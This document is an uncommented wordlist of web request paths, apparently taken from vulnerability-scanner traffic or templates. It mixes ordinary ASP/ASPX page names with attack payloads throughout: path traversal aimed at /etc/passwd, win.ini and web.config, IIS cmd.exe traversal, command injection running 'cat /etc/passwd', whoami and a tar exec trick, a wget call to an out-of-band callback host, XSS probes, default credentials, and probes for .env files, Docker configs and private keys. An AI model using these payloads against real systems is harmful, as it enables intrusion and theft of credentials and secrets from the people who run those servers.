1_0_2204
1_0_2204_21
1_0_2914
1_0_2914_0
1_0_3705
1_0_3705_0
1_0_3705_209
1_0_3705_288
1_0_3705_6018
1_1_4322
1_1_4322 
1_1_4322_2032
1_1_4322_2300
1_1_4322_2310
1_1_4322_2407
1_1_4322_2443
1_1_4322_510
1_1_4322_573
2_0_40607
2_0_40607_16
2_0_50215
2_0_50215_44
2_0_50727
2_0_50727_1433
2_0_50727_1434
2_0_50727_3053
2_0_50727_3082
2_0_50727_312
2_0_50727_3603
2_0_50727_3607
2_0_50727_3615
2_0_50727_4016
2_0_50727_4016 
2_0_50727_42
2_0_50727_4918
2_0_50727_4927
2_0_50727_4952
2_0_50727_832
2_0_50727_832/
%20../web-inf/
..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
25twdIMfRgQmjF6PvkbGAf9JfsL.php
25twdJjfpeOIAfKLGmXIrR58YEK.php%5Cx0A
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fGemfile HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpackage.json HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpackage-lock.json HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fweb.config HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2fGemfile HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2fpackage.json HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2fpackage-lock.json HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2fweb.config HTTP/1.1
%2e%2e%2f%2e%2e%2fGemfile HTTP/1.1
%2e%2e%2f%2e%2e%2fpackage.json HTTP/1.1
%2e%2e%2f%2e%2e%2fpackage-lock.json HTTP/1.1
%2e%2e%2f%2e%2e%2fweb.config HTTP/1.1
%2e%2e%2fGemfile HTTP/1.1
%2e%2e%2fpackage.json HTTP/1.1
%2e%2e%2fpackage-lock.json HTTP/1.1
%2e%2e%2fweb.config HTTP/1.1
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1
3_0_4506
3_0_4506_2123
3_0_4506_2254
3_0_4506_26
3_0_4506_30
3_0_4506_590
3_0_4506_648
3_5_20404
3_5_20404_0
3_5_20706
3_5_20706_1
3_5_21022
3_5_21022_8
3_5_30428
3_5_30428_1
3_5_30729
3_5_30729_01
3_5_30729_4926
4_0_20506
4_0_21006
4_0_30128
4_0_30128_1
4_0_30319
4_0_30319 
4_0_30319_1
4_0_30319_17020
4_0_30319_17379
4_0_30319_17626
4_0_30319_17929
404.asp
404.aspx
4_5_40805
4_5_50131
4_5_50501
4_5_50709
...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini
....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini
//%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd HTTP/1.1
a%5c.aspx
about.asp
About.aspx
aboutme.asp
about/../tree?action=get
AccessDenied.aspx
AccessPlatform/
AccessPlatform/auth/
AccessPlatform/auth/clientscripts/
AccessPlatform/auth/clientscripts/cookies.js 
AccessPlatform/auth/clientscripts/login.js 
AccessTopic.asp
account
Account.aspx
account/register
action.asp
actions/authenticate.php
activate.asp
Active.aspx
actuator/env
AdAdmin.asp
Adadmin_Save.asp
add2.asp
add.asp
Add.aspx
Add_entry.aspx
addfile.asp
addnews.asp
Address.asp
add_user.asp
AddUser.aspx
Add_Vote.asp
adm/file.cgi?next_file=%2fetc%2fpasswd
admin/
admin_admin.asp
admin_art.asp
admin.asp
admin.aspx
admin_batch.asp
admin_boardset.asp
admin_canmou.asp
admin_cgglzn.asp
admin_chengguo.asp
admin_cmzz.asp
admin_config.asp
admin_copyright.asp
Admin_Decode.asp
Admin_Default.asp
admin_diary.asp
admin_dj.asp
admin_down.asp
admin_duiwu.asp
admin/elfinder/elfinder-cke.html
admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0
admin_flash.asp
admin_flashdel.asp
admin_flashedit.asp
admin_gonggao.asp
administrador.asp
administration
administrator
admin_jhdown.asp
admin_jhglzn.asp
admin_jiaoxue.asp
admin_jihua.asp
admin_js.asp
admin_keji.asp
admin_left.asp
admin_link.asp
Admin_list.asp
admin_lockuser.asp
Admin_Login.asp
adminLogin.aspx
admin/login/
Admin_Menu.asp
AdminMenu.asp
Admin_ModiPwd.asp
admin_neibu.asp
admin_news.asp
admin_other.asp
admin_pic.asp
admin_postings.asp
Admin_Private.asp
admin_save.asp
Admin_Style.asp
admin_upfile.asp
admin_upload.asp
Admin_UploadFile.asp
admin_user.asp
admin_view.asp
admin_viewok.asp
admin_vote.asp
admin_web.asp
admin_weiyuanhui.asp
admin_xiangmu.asp
admin_xmglzn.asp
admin_xsglzn.asp
admin_xuebao.asp
admin_xueshu.asp
admin_zhengzhi.asp
admin_zhidu.asp
admin_zhiliang.asp
admin_zlglzn.asp
adovbs.inc
adsamples
AdvWorks/equipment/catalog_type.asp
agc/vicidial_mysqli_errors.txt
ajax/api/content_infraction/getIndexableContent
ajax/render/widget_tabbedcontainer_tab_panel
ajfhasdfgsagfakjhgd
aj.html?a=devi
AllDel.asp
anchor/errors.log
announce.asp
announcements.asp
.antproxy.php
api/25twdGL170TlhcqVAP2C4ThFMek
api/config
Api_Config.asp
api/downloads?fileName=../../../../../../../../etc/passwd
api/.env
api/experimental/dags/example_trigger_target_dag/dag_runs
api/experimental/dags/example_trigger_target_dag/paused/false
api/experimental/test
api/login
api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
api/settings/values
apisix/admin/user/login
apisix/batch-requests
api/userrolelist/systemRoles?require-cfg.js
api/users/admin/check
api/v4/ci/lint?include_merged_yaml=true
app.aspx
appGet.cgi?hook=get_cfg_clientlist()
applications.pinpoint
apply_sec.cgi
archi~1
archiv~1
archive.aspx
array.asp
article.asp
Article.aspx
articles.asp
artifactory/ui/auth/login?_spring_security_remember_me=false
artifactory/ui/repodata?deploy=true
asp
aspcheck.asp
aspnet_client
aspnet_files
asps
ASPSamp/AdvWorks/equipment/catalog_type.asp
asptemplate.asp
assets/app/something/services/AppModule.class/
assets/backend/elfinder/elfinder-cke.html
assets/elFinder-2.1.9/elfinder.html
assets/elFinder/elfinder.html
assets/file:///etc/passwd
Atendimento.asp
_AuthChangeUrl?
.axiom/accounts/do.json
axis2-admin/login
axis2/axis2-admin/login
backend/elfinder/elfinder-cke.html
badging/badge_print_v0.php?tpl=../../../../../etc/passwd
BadWord.asp
bag2
base64.asp
base.asp
basexml.asp
basics.asp
BbsFace.asp
bin
bins
blank.asp
Blog.aspx
Blogroll.aspx
Blogs.aspx
bmjj.asp
Board.asp
boardDataWW.php
Boardhelp.asp
boardpermission.asp
BoardSetting.asp
boardstat.asp
BoardUnite.asp
BokeAdmin.asp
BokeApply.asp
Boke.asp
BokeDescription.asp
BokeIndex.asp
BokeManage.asp
Bokepostings.asp
BokeRss.asp
BokeSearch.asp
BokeUpload.asp
bookInfo.aspx
Book_info.aspx
BookItemsAdmin.aspx
bottom.asp
BSW_cxttongr.htm
Bugs.aspx
bugs/verify.php?confirm_hash=&id=1
Buy.aspx
BuyPost.asp
/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml? HTTP/1.1
/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml? HTTP/1.1
/%C0%AE%C0%AE/WEB-INF/web.xml? HTTP/1.1
cache.asp
calendar.asp
Captcha.asp
carbon/admin/login_action.jsp
card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60
casa/nodes/thumbprints
Catalog.aspx
catalog.php?filename=../../../../../../../../../etc/passwd
Categories.aspx
CategoryAdmin.aspx
category.asp
Category.aspx
CategoryDAO.asp
certcontrol
certenroll
certsrv
cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
CFIDE/Administrator/startstop.html
cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/25twdNSQaTD7AIbb34p77k1iifo.jsp
cggl.asp
cgglzn.asp
cgi
cgi-bin
cgi-bin/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/bin/sh
cgi-bin/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
cgi-bin/a1stats/a1disp.cgi
cgi-bin/../../../bin/sh
cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
cgi-bin/../../../../etc/passwd
cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd
cgi-bin/htimage.exe?2,2
cgi-bin/htmlscript
cgi-bin/imagemap.exe?2,2
cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27
cgi-bin/login.cgi
cgi-bin/luci/
cgi-bin/privatekey.pem
cgi-bin/system_mgr.cgi
cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget
cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
cgi/networkDiag.cgi
Challenge.asp
Chan_Const.asp
change_pass.asp
ChangePassword.asp
ChangePassword.aspx
ChangePasswordSuccess.aspx
ChangePwd.aspx
char.asp
chat.asp
checkapache.html
check.asp
checkcode.asp
CheckInput.asp
checklogin.asp
Checkout.aspx
checkValid
chkinput.asp
ChkLogin.asp
citrix
citrix/AccessPlatform/auth
citrix/AccessPlatform/auth/clientscripts
Citrix//AccessPlatform/auth/clientscripts/cookies.js 
Citrix/AccessPlatform/auth/clientscripts/login.js 
Citrix/PNAgent/config.xml
class.asp
class_upload.asp
ClearCache.asp
clocktower
__clockwork/app
cls_article.asp
Cls_DvApi.asp
Cls_Main.asp
Cls_System.asp
clsUpload.asp
cmsample
code.asp
ColorPicker.aspx
command.cgi?cat%20/etc/passwd
commands.asp
comment.asp
Comment.aspx
Comments.aspx
common
common~1
_common.asp
common.asp
comm.php?id=../../../../../../../../../../etc/passwd
components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
compress.php?file=../../../../../../../etc/passwd
concrete5/index.php/install
../conf/config.properties
config.asp
config/databases.yml
config.js
Confirm.aspx
Confirmation.aspx
confluence/pages/createpage-entervariables.action
confluence/pages/createpage-entervariables.action?SpaceKey=x
conn1.asp
Conn.asp
ConnBook.asp
ConnDB.asp
connection.asp
connector.asp
connector.aspx
ConnJobs.asp
ConnNew.asp
ConnNews.asp
ConnOther.asp
ConnProdu.asp
Conntaolun.asp
Connwl.asp
console/
console/j_security_check
console/login/LoginForm.jsp
const.asp
contact.asp
Contact.aspx
ContactUs.aspx
Content.aspx
contrib/acog/print_form.php?formname=../../../etc/passwd%00
control.asp
ControlPanel.aspx
Controls.aspx
cookies.asp
copyright.asp
core.asp
countvote.asp
CreateAccount.aspx
Create.aspx
CreateUser.aspx
CreateVirtualServer.aspx
crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
CS_ClassTemplate.aspx
+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
CS_DynamicScaffold.aspx
CS_GeneratedScaffoldCodeBehind.aspx
CS_GeneratedScaffoldMarkup.aspx
CS_ODSController.aspx
CSS.asp
CS_SPTemplate.aspx
CS_StructsTemplate.aspx
css/../../../../../../../../../../../../../../../../../../windows%5Cwin.ini
CS_ViewTemplate.aspx
cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
daima.asp
dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
Dashboard.aspx
Data.asp
Data.aspx
date.asp
db
db.asp
.dbeaver/credentials-config.json
debug.asp
DeCode.asp
Default2.aspx
default.asp
Default.aspx
del.asp
delete.asp
Delete.aspx
Deleted.aspx
del_user.asp
delvote.asp
demo.asp
Detail.aspx
Details.aspx
device.rsp?opt=user&cmd=list
dir.inc.asp
dispbbs.asp
Display.aspx
dispuser.asp
doc_add.asp
.dockercfg
.docker/config.json
document.asp
document.php?modulepart=project&file=../../../../../../../etc/passwd
domcfg.nsf/?open
down.asp
download.asp
download.aspx
DownloadFile.aspx
downloadlist.asp
download.php?file=../../../../../etc/passwd
downloads/../../../../../../../../../etc/passwd
download?type=files&filename=../../../../../../../../etc/passwd
DrawMagicFace.asp
.drone.yml
druid/index.html
duiwu.asp
Dv_ClsMain.asp
Dv_ClsOther.asp
dv_dpo.asp
Dv_GetCode.asp
Dv_News.asp
Dv_News_Demo.asp
Dv_NewsView.asp
Dv_ubbcode.asp
dzbl_del.asp
dzbl_List.asp
easp.asp
edit.asp
Edit.aspx
EditEvent.aspx
EditGalleries.aspx
EditImage.aspx
Editor.aspx
EditProfile.aspx
edit_user.asp
EditUser.aspx
EditVersion.aspx
elfinder/elfinder-cke.html
Email.asp
Email_Cls.asp
email_word.asp
en.asp
en/php/usb_sync.php
.env
.env_1
.env.backup
.env.development.local
.env.dev.local
.env.example
.env.live
.env.local
.env.old
.env.prod.local
.env.production.local
.env_sample
.env.save
.env.stage
eokedit1.asp
eokedit.asp
error404.aspx
error.asp
Error.aspx
ErrorPage.aspx
errors.asp
ErrorsGridView.aspx
ErrorsRssView.aspx
.esmtprc
etc/groovyconsole.html
.../.../.../.../.../.../.../.../.../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../..//etc/passwd
../../etc/passwd
/../../../../../../../../etc/passwd%00.jpg HTTP/1.1
/../../../../../../../../etc/passwd%00.jsp HTTP/1.1
/../../../../../../../../etc/passwd%C0%80.jsp HTTP/1.1
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../etc/passwd HTTP/1.1
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\etc/passwd HTTP/1.1
eWebEditor.asp
Exadmin
example.asp
Exchange
exchange/root.asp
ExchWeb
Exit.asp
export.asp
Export.aspx
FAQ.aspx
favicon.ico
favlist.asp
fckeditor.asp
feed.asp
Feed.aspx
fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
file%3DC:%5CWindows%5Cwin.ini
file_add_db.asp
File_Admin_AddNew.asp
File_Admin_List.asp
File_Admin_Modify.asp
File_Admin_Modify_save.asp
File_Admin_News_Del.asp
file.asp
FileManager.aspx
fileshow.asp
FileUpload.aspx
FillNode.aspx
flash.asp
flash_play.asp
Foot.asp
footer.asp
forgot_password.asp
ForgotPassword.aspx
form.asp
Form.aspx
FORMAT.asp
ForumAds.asp
forum_arc.asp
forum.asp
Forum.aspx
ForumNewsSetting.asp
ForumPay.asp
forum_professionnel.asp
Forums.aspx
_fpclass
fpdf.asp
fpsample
fpui/loginServlet
FreeASPUpload.asp
friend.asp
friendlist.asp
Friends.aspx
ftb.imagegallery.aspx
func.asp
function.asp
functions.asp
Gallery.aspx
GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
gbook.asp
gdAdmin.asp
gdadmin_Save.asp
../../../../../Gemfile HTTP/1.1
../../../../Gemfile HTTP/1.1
../../../Gemfile HTTP/1.1
../../Gemfile HTTP/1.1
../Gemfile HTTP/1.1
general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
Generate.aspx
get.asp
getcfg.php
GetChallengeWord.asp
GetCode.asp
ggnews.asp
glml.asp
Global.asp
glxz.asp
glzn.asp
goform/setmac
gonggao.asp
grade.asp
groovyconsole
Group.asp
GroupPermission.asp
Groups.aspx
guest_auth/guestIsUp.php
guestbook.asp
gywm_Modify.asp
gywm_Modify_Save.asp
head.asp
header.asp
help
Help.asp
Help.aspx
HelpRaw.aspx
helpview.asp
history.aspx
homeaction.php
Home.aspx
host.key
html/log
http/index.php
hue/assets/../../../../../../../etc/passwd
IDWindow.aspx
_ignition/execute-solution
iiasdmpwd
iisadmin
iisadmpwd
iisadmpwd/achg.htr
iisadmpwd/aexp2b.htr
iisadmpwd/aexp2.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4b.htr
iisadmpwd/aexp4.htr
iisadmpwd/aexp.htr
iisadmpwd/anot3.htr
iisadmpwd/anot.htr
iishelp
iishelp/iis/misc/default.asp
iissamples
iissamples/exair/howitworks/Code.asp
iissamples/exair/howitworks/Codebrw1.asp
iissamples/exair/howitworks/Codebrws.asp
iissamples/sdk/asp/docs/codebrw2.asp
iissamples/sdk/asp/docs/codebrws.asp
iissamples/sdk/asp/docs/CodeBrws.asp
ImageGallery.aspx
images
images.asp
images/../info.html
images/logo/logo-eoffice.php
img.asp
imgnews.asp
imprimer.asp
inc.asp
inc_config.asp
inc_connection.asp
inc_header.asp
inc_ilanlar.asp
inc_language.asp
include.asp
includes/adovbs.inc
index1.asp
index.asp
Index.aspx
index/login.cgi
indexnew.asp
index.php
index.php?class=../../../../../../../etc/passwd%00
index.php?id=50&file=../../../../../../../../../etc/passwd
index.php/install
index.php?m=member&f=login_save
index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00
index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_jejob&view=../../../../../../etc/passwd%00
index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
index.php?page=/etc/passwd%00
index.php?page_slug=../../../../../etc/passwd%00
index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
index.php?plot=;wget%20http://c8gn9o4dtd8ppc0tpffgceoa8heyynn5h.oast.me
index.php?s=Admin-Data-down&id=../../Conf/config.php
index.shtml
index_sso.php
inetpub
inetsrv
Info.asp
Info.aspx
InfoList.asp
Init.asp
Inscription.aspx
insert.asp
insidelist.asp
insidenews.asp
install
install.asp
install.aspx
interface.asp
io.asp
ipython/tree
isapi
item.asp
Item.aspx
Items.aspx
jars/upload
javax.faces.resource/dynamiccontent.properties.xhtml
jgjs.asp
jhgl.asp
jhglzn.asp
JobAdmin.asp
Job.asp
jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc
JobsAdmin_AboutUs.asp
JobsAdmin_AboutUs_Save.asp
JobsAdmin_Job.asp
JobsAdmin_Job_Del.asp
JobsAdmin_Job_Modify.asp
JobsAdmin_Job_Publish.asp
JobsAdmin_Job_Save.asp
JobsAdmin_Job_Update.asp
JobsAdmin_Person.asp
JobsAdmin_Person_Del.asp
JobsAdmin_Person_Info.asp
Jobs.aspx
JoinVipGroup.asp
JSON_2.0.2.asp
JSON.asp
jsonParser.asp
jsonRpcServer.asp
JSON_UTIL_0.1.1.asp
jxnews.asp
jxpj.asp
KeepAlive.aspx
Keywords.asp
keywords.aspx
Label.asp
language.asp
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
lcms/index.php
left1.asp
left2.asp
left3.asp
left4.asp
left5.asp
left.asp
LetsEncrypt/Index?fileName=/etc/passwd
Link.asp
links.asp
Links.aspx
list.asp
List.aspx
liuyan_Del.asp
liuyan_Del_en.asp
liuyan_List.asp
liuyan_List_en.asp
liuyan_show.asp
liuyan_show_en.asp
live
live/h264
live/h264/ch1
live/h264/ch2
live/mjpeg
liwei.asp
LoadIndexKeywords.aspx
Loadservoces.asp
loadtree1.asp
loadtree.asp
localhost.key
location.asp
LockIP.asp
Log.asp
Log.aspx
login
login/
login.asp
Login.aspx
login?login=lutron&password=lutron
login.php
login.php?action=login&type=admin
LogOff.asp
Logoff.aspx
LogOn.aspx
logout.asp
Logout.aspx
lostpass.asp
lyCode.asp
Mail.aspx
mailingupgrade.php
main.asp
Main.aspx
MainFeed.aspx
manage.asp
manage_user.asp
ManageUsers.aspx
market
math.asp
md5.asp
mdb.asp
member.asp
_mem_bin
]_mem_bin/autoconfig.asp
_mem_bin/formslogin.asp
menu.asp
Menu.aspx
Message.asp
Message.aspx
Messages.aspx
messanger.asp
Micros~1
Microsoft-Server-ActiveSync
mifs/.%3B/services/LogService
mmAdmin.asp
Mod_admin.asp
modifyadd.asp
modifypic.asp
modifypic_news.asp
modifypic_produ.asp
modifyprodupic.asp
Modules.aspx
Mod_Vote.asp
MoneyLog.asp
monitor.asp
Move.aspx
movebloc.asp
msadc
msa/../../../../../../../../etc/passwd
msdac/root.exe?/c+dir
mspress30
music.asp
myadmin.asp
myfile.asp
mymodify.asp
MyPage.aspx
Myplus.asp
MyProfile.aspx
myspace.asp
Navigation.aspx
%NETHOOD%
newadmin_addnew.asp
newadmin_addnew_save.asp
newadmin.asp
newadmin_list.asp
NewAdmin_Modify.asp
NewAdmin_Modify_Save.asp
NewAdmin_New_Del.asp
New.aspx
newpass.asp
NewsAdmin_AddNew.asp
NewsAdmin_AddNew_Save.asp
NewsAdmin_AddType.asp
NewsAdmin.asp
NewsAdmin_DelType.asp
NewsAdmin_HomeAdd.asp
NewsAdmin_HomeAdd_Save.asp
NewsAdmin_Home.asp
NewsAdmin_Home_Doing.asp
NewsAdmin_Home_Modify.asp
NewsAdmin_HomeModify_Save.asp
NewsAdmin_Home_Pic.asp
NewsAdmin_List.asp
NewsAdmin_Modify1.asp
NewsAdmin_Modify.asp
NewsAdmin_Modify_Save.asp
NewsAdmin_News_Del.asp
NewsAdmin_Type.asp
news.asp
News.aspx
NewsList.aspx
newsshow.asp
NewUser.aspx
node_modules/mqtt/test/helpers/
NotAuthorised.aspx
Notes.aspx
NotFound.aspx
Notice.aspx
nuclei.txt
null.htw
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml
OMA
online.asp
op/op.Login.php
Options.aspx
oracle.asp
Order.aspx
orderDetail.aspx
OrderDetails.aspx
OrderList.aspx
orders/3
Orders.aspx
OtherAdmin.asp
out.asp
overview.asp
OWA
owa/auth/x.js
../../../../package.json HTTP/1.1
../../../package.json HTTP/1.1
../../package.json HTTP/1.1
../package.json HTTP/1.1
../../../../package-lock.json HTTP/1.1
../../../package-lock.json HTTP/1.1
../../package-lock.json HTTP/1.1
../package-lock.json HTTP/1.1
pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
page.asp
Page.aspx
Pages.aspx
pages/createpage.action?spaceKey=myproj
pages/createpage-entervariables.action
pages/createpage-entervariables.action?SpaceKey=x
pages/doenterpagevariables.action
pages/systemcall.php?command=cat%20/etc/passwd
pages/templates2/viewpagetemplate.action
PageView.aspx
passport.asp
PasswordAdmin.asp
Passwordadmin_Save.asp
password.cgi
password.html
password.jsn
pay_boardlimited.asp
Payment.aspx
pbserver
pbserver/pbserver.dll
pentaho/api/userrolelist/systemRoles?require-cfg.js
Person.aspx
PhotoList.aspx
phpmyadmin
phpmyadmin/index.php
pic.asp
pic_List1.asp
pic_List.asp
PingServices.aspx
pinyin.asp
pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc
plugin/customMethod
_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
Plus.asp
plus_check.asp
plus_MagicFace_const.asp
plus_Tools_Center.asp
plus_Tools_const.asp
Plus_Tools_Info.asp
plus_Tools_InfoSetting.asp
Plus_Tools_Magicface.asp
plus_Tools_Magiclist.asp
plus_Tools_pay.asp
plus_Tools_postings.asp
Plus_Tools_User.asp
PollAdmin_add.asp
PollAdmin_admin.asp
PollAdmin.asp
PollAdmin_delete.asp
PollAdmin_display.asp
PopUp.asp
post.asp
Post.aspx
PostCls.asp
PostData.asp
postinfo.html
Posts.aspx
post_upload.asp
Preferences.aspx
preview.asp
.printer
printers
_private
private.asp
private-key
produAdmin_AddNew.asp
produAdmin_AddNew_Save.asp
ProduAdmin_Addpinpai.asp
ProduAdmin_AddProdu.asp
ProduAdmin_AddType.asp
ProduAdmin.asp
ProduAdmin_childpinpai.asp
ProduAdmin_childpinpaiSave.asp
ProduAdmin_childSave.asp
ProduAdmin_childtype.asp
ProduAdmin_daType.asp
ProduAdmin_DelOrder.asp
ProduAdmin_Delpinpai.asp
ProduAdmin_DelProdu.asp
ProduAdmin_DelType.asp
produAdmin_List.asp
produAdmin_Modify.asp
ProduAdmin_Modify_Save.asp
ProduAdmin_NewProdu.asp
produAdmin_News_Del.asp
ProduAdmin_Order.asp
ProduAdmin_Order_See.asp
ProduAdmin_pinpai.asp
ProduAdmin_PubProdu.asp
ProduAdmin_Type.asp
ProduAdmin_xiaoType.asp
product.asp
Product.aspx
products.aspx
Profile.asp
Profile.aspx
Profiles.aspx
progra~1
Progra~1
Project.aspx
Projects.aspx
PropertyList.aspx
PubAdmin.asp
Pubadmin_Save.asp
Public
public/config.js
public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
Publish.aspx
publisher
query.asp
Query.aspx
query?db=db&q=SHOW%20DATABASES
Query_get.asp
qwertypoiu.htw
qwertypoiu.printer
Receive.asp
recherche.aspx
Record.asp
recycle.asp
Redirect.aspx
referrers.aspx
reg.asp
register.asp
Register.aspx
Registration.aspx
reg_upload.asp
Releases.aspx
ReloadForumCache.asp
reply.asp
Report.aspx
Reports.aspx
ReportServer?op=fr_server&cmd=sc_getconnectioninfo
ReportServer/Pages/ReportViewer.aspx
Reserve.aspx
Reset.asp
ResetPassword.aspx
result.asp
Results.aspx
right.asp
robots.txt
Room.aspx
RoomManager.aspx
rootDesc.xml
RPC2_Login
rss.asp
RSS.aspx
RssFeed.asp
rubrique.asp
run
sample01.asp
sample02.asp
sample03.asp
sample04.asp
sample.aspx
sampleposteddata.asp
samples
saveadmin.asp
save.asp
Save.aspx
Saved.aspx
savepost.asp
savevote.asp
SayAdmin.asp
SayAdmin_Del.asp
ScheduleSlot.aspx
scode.asp
~/<script>alert('XSS')</script>.asp
<script>alert('XSS')</script>.aspx
~/<script>alert('XSS')</script>.aspx
scripts
scripts 
scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
scripts/cgimail.exe
scripts/convert.bas
scripts/counter.exe
scripts/fpcount.exe
scripts/iisadmin/ism.dll?http/dir
scripts/no-such-file.pl
scripts/root.exe?/c+dir
scripts/samples
scripts/samples/search/webhits.exe
scripts/tools
scripts/tools/getdrvs.exe
scripts/tools/newdsn.exe
